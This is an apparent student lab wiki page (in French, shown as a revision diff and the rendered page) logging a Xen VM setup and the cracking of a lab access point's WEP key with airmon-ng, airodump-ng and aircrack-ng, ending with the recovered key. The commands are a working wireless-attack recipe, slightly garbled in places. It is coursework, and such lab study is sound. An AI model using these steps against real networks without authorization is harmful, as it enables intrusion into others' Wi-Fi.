TP sysres IMA5sc 2019/2020 G6 : Différence entre versions
(→Choix du nom de domaine) |
(→cassage de la clef WEP d'un point d'accès Wifi) |
||
Ligne 17 : | Ligne 17 : | ||
===cassage de la clef WEP d'un point d'accès Wifi=== | ===cassage de la clef WEP d'un point d'accès Wifi=== | ||
− | Cette partie a été réalisé sur une machine | + | Cette partie a été réalisé sur une machine sur laquelle on a branché une clé WIFI. |
− | + | J'ai commencé par installé aircrack, l'outil qui me servira à cracker les différentes clefs. | |
− | + | je commence par créer l'interface wlan0 avec laquelle je vais récupérer les paquets que je souhaite capturer. | |
Pour créer cet interface je lance la commande: | Pour créer cet interface je lance la commande: | ||
− | airmon-ng wlan0mon | + | airmon-ng start wlan0mon |
− | + | Ensuite j'observe les BSSID qui circulent sur le réseau: | |
+ | airodump-ng --encrypt wep wlan0mon | ||
+ | |||
+ | Je copie les paquets qui circulent sur cracotte06 et je les sauvegardent dans mon fichier craquage.txt | ||
+ | airodump-ng craquag.txt -c 2 --bssid 04:DA:D2:9C:50:55 wlan0mon | ||
+ | |||
+ | Enfin je réalise le cassage de la clef: | ||
+ | aircrack-ng craquage.txt.cap | ||
+ | |||
+ | Pour décrypter la clef il a fallu capturer 30 000 paquets et testé 673 clefs ce qui aura pris 5 minutes. | ||
+ | KEY FOUND! [F1:CA:C4:00:00:00:00:00:00:00:99:99:99] | ||
+ | Decrypted correctly:100% | ||
==4eme seance== | ==4eme seance== |
Version du 25 novembre 2019 à 22:37
Sommaire
1ère séance
Choix du nom de domaine
Sur le site gandi.net, j'ai acheté le nom de mon domaine qui est: blennoragie.site.
Installation de la machine virtuelle Xen
Via une connection en SSH à cordouan.insecserv.deule.net, j'ai installé l'image de la machine virtuelle Xen par la commande suivante
xen-create-image --hostname=blennoragie --dhcp -- dir=/usr/local/xen
le paramètre hostname spécifie le nom de ma machine(blennoragie) et les disques virtuels sont stockés dans le repertoire(/usr/local/xen):
L'adresse MAC obtenue est : 00:16:3E:D6:E1:DF
2ème séance
cassage de la clef WEP d'un point d'accès Wifi
Cette partie a été réalisé sur une machine sur laquelle on a branché une clé WIFI.
J'ai commencé par installé aircrack, l'outil qui me servira à cracker les différentes clefs.
je commence par créer l'interface wlan0 avec laquelle je vais récupérer les paquets que je souhaite capturer.
Pour créer cet interface je lance la commande:
airmon-ng start wlan0mon
Ensuite j'observe les BSSID qui circulent sur le réseau:
airodump-ng --encrypt wep wlan0mon
Je copie les paquets qui circulent sur cracotte06 et je les sauvegardent dans mon fichier craquage.txt
airodump-ng craquag.txt -c 2 --bssid 04:DA:D2:9C:50:55 wlan0mon
Enfin je réalise le cassage de la clef:
aircrack-ng craquage.txt.cap
Pour décrypter la clef il a fallu capturer 30 000 paquets et testé 673 clefs ce qui aura pris 5 minutes.
KEY FOUND! [F1:CA:C4:00:00:00:00:00:00:00:99:99:99] Decrypted correctly:100%
4eme seance
5ème seance
2ème séance
cassage de la clef WEP d'un point accès Wifi